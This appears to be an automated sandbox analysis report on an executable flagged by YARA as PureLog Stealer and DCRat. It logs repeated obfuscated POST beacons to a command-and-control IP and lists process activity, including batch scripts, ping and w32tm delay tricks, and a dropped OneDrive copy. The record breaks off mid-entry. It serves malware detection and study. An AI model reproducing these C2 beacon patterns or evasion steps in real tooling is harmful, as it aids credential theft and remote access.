                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  12 | 192.168.2.7 | 49983 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:54:41.150063992 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:41.505825996 CET | 336 | OUT | Data Raw: 05 00 01 05 06 09 04 02 05 06 02 01 02 05 01 05 00 02 05 00 02 01 03 0f 07 00 0d 54 03 04 06 06 0d 55 04 00 00 51 06 0a 0c 07 05 06 06 07 07 52 04 53 0c 0c 0f 0e 04 05 04 53 03 0d 06 52 07 5d 03 06 0a 00 06 03 06 09 0d 07 0f 0f 0f 53 0c 55 02 06
                                                  Data Ascii: TUQRSSR]SUQ\L}RkYb@t[n\afkRRuw|lhMw[y|wK{Y}X|~hNvwhAje~V@xmP~Oy
                                                  Nov 19, 2024 18:54:41.815114975 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  13 | 192.168.2.7 | 49984 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:54:50.437344074 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:50.787081957 CET | 344 | OUT | Data Raw: 00 06 01 02 06 0d 01 02 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                                  Data Ascii: TPT]ST]XU\L}S|cu\`[qbehAhlzYclZMxDoBElYv}}|vg{Zie~V@A{}~~Lu
                                                  Nov 19, 2024 18:54:51.059525967 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:50 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  14 | 192.168.2.7 | 49985 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:01.748260975 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:02.099694014 CET | 344 | OUT | Data Raw: 05 01 04 07 03 08 01 06 05 06 02 01 02 02 01 0a 00 00 05 0d 02 01 03 0f 02 51 0e 04 05 01 00 00 0a 0f 03 0f 03 54 05 04 0c 03 06 0a 05 0a 05 52 06 01 0b 09 0d 55 06 05 06 02 06 54 06 57 06 0b 02 54 0c 00 00 0e 04 56 0c 00 0e 0f 0f 53 0d 05 07 0d
                                                  Data Ascii: QTRUTWTVSZXV\L~|zN`\b^uvlAk|[Btlps|IycH{YjkSU`YtO~u~V@zmz~bS
                                                  Nov 19, 2024 18:55:02.391093016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:02.525419950 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:02 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  15 | 192.168.2.7 | 49986 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:13.948293924 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:14.302742004 CET | 344 | OUT | Data Raw: 05 01 04 07 03 0a 04 01 05 06 02 01 02 06 01 05 00 0b 05 0b 02 06 03 0a 01 07 0d 53 06 05 03 09 0c 0f 05 0b 00 01 06 51 0d 06 05 07 04 05 04 00 05 03 0d 09 0a 03 04 52 04 57 06 0c 07 07 06 0c 01 01 0f 5e 00 0e 01 01 0e 03 0b 00 0d 04 0e 54 02 05
                                                  Data Ascii: SQRW^T\RWU\L}R|}[`an_v[t|Rb]copBh`|ylZZoY}[|m`wg`~u~V@B{SPL}\y
                                                  Nov 19, 2024 18:55:14.567323923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:14.696804047 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:14 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  16 | 192.168.2.7 | 49987 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:24.009685993 CET | 449 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:24.365673065 CET | 344 | OUT | Data Raw: 05 01 04 01 03 0a 04 07 05 06 02 01 02 06 01 0a 00 0a 05 00 02 0c 03 0f 01 0e 0d 01 04 50 02 05 0a 0e 05 00 03 00 06 0a 0c 56 02 0a 06 53 04 05 06 01 0b 01 0c 07 06 05 05 0f 05 0d 04 02 05 5a 00 07 0e 0b 05 02 04 02 0c 05 0e 05 0e 07 0f 00 06 54
                                                  Data Ascii: PVSZTP\L~ANrcbyuuSkuLvlZs{_ylZ[zp}YCx`gpj_~V@Bzm\rS
                                                  Nov 19, 2024 18:55:24.637973070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:24.769146919 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:24 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  17 | 192.168.2.7 | 49988 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:34.582887888 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:34.927855968 CET | 344 | OUT | Data Raw: 05 05 04 06 03 0d 01 00 05 06 02 01 02 01 01 06 00 0b 05 00 02 06 03 01 00 0f 0d 56 04 57 02 50 0c 00 04 5a 03 05 05 07 0c 01 04 01 00 0b 04 06 07 04 0c 0d 0c 05 06 06 04 07 05 02 04 07 06 0c 03 04 0f 5e 07 51 05 00 0c 03 0e 55 0f 04 0e 53 04 54
                                                  Data Ascii: VWPZ^QUSTPRQ\L~h^y^waia[UUhlXYtBphZ`{dZl`e_|ChNwt|}O~V@{mP}\[
                                                  Nov 19, 2024 18:55:35.236042023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:35.371102095 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:35 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  18 | 192.168.2.7 | 49989 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:46.208605051 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:46.552829027 CET | 344 | OUT | Data Raw: 00 06 04 05 06 09 04 01 05 06 02 01 02 00 01 07 00 0a 05 0b 02 07 03 0e 00 06 0d 54 03 06 01 09 0c 01 04 0b 01 07 04 01 0f 04 07 05 07 51 05 55 05 00 0b 0a 0e 06 04 52 07 04 04 54 04 55 06 0c 05 05 0f 5d 05 03 04 04 0e 50 0d 06 0a 05 0e 53 02 0d
                                                  Data Ascii: TQURTU]PSR\L~@|NvN`aqaewRhB[thM~``xlo{b~hctli_~V@{}\L}Li
                                                  Nov 19, 2024 18:55:46.828692913 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:46 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  19 | 192.168.2.7 | 49990 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:55:57.626796007 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:57.974956036 CET | 344 | OUT | Data Raw: 00 02 04 05 06 0b 04 05 05 06 02 01 02 01 01 0a 00 03 05 0b 02 0d 03 0c 01 05 0d 04 03 02 01 03 0a 0f 05 08 01 02 05 01 0b 07 05 57 05 51 05 54 03 0a 0f 00 0f 53 04 51 05 06 04 57 04 51 05 5a 02 0a 0e 0b 04 02 07 00 0e 52 0c 01 0d 0c 0e 56 04 0c
                                                  Data Ascii: WQTSQWQZRVRP\L~@k`~vbz]a`hUiLwlYMt{cJ{s}Z|kQ`Iw]i_~V@zmvLba
                                                  Nov 19, 2024 18:55:58.454690933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:58.455607891 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:58 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                                                  Nov 19, 2024 18:55:58.455622911 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:58 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  20 | 192.168.2.7 | 49991 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:56:08.019062996 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:56:08.365339041 CET | 344 | OUT | Data Raw: 00 03 01 05 06 0e 04 02 05 06 02 01 02 02 01 06 00 0b 05 0e 02 0d 03 09 02 55 0f 06 06 04 02 02 0d 55 05 59 03 01 06 00 0b 0b 07 06 06 0b 07 54 06 54 0b 01 0a 0f 06 02 07 06 06 54 04 0b 05 01 02 56 0c 0c 07 03 05 04 0f 01 0d 01 0d 0d 0e 09 06 01
                                                  Data Ascii: UUYTTTVXV\L~@|NTcaubvhRuLvllkcc^oRlYzpqYkmoRtw[iO~V@{mPbu
                                                  Nov 19, 2024 18:56:08.669126034 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Target ID:0
                                                  Start time:12:52:07
                                                  Start date:19/11/2024
                                                  Path:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\KPFv8ATDx0.exe"
                                                  Imagebase:0x3a0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:12:52:11
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:12:52:18
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x9e0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:12:52:22
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff7e17d0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:14:45:35
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0xd50000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:14:45:38
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:14:45:38
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:14:45:39
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:14:45:39
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff755dd0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:14:45:46
                                                  Start date:19/11/2024
                                                  Path:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                                                  Imagebase:0x1c0000
                                                  File size:2'882'048 bytes
                                                  MD5 hash:3FF58B353CD7E1B70EB300561E146E6C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                                                  Imagebase:0x7ff676360000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:14:45:49
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff761480000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:14:45:50
                                                  Start date:19/11/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
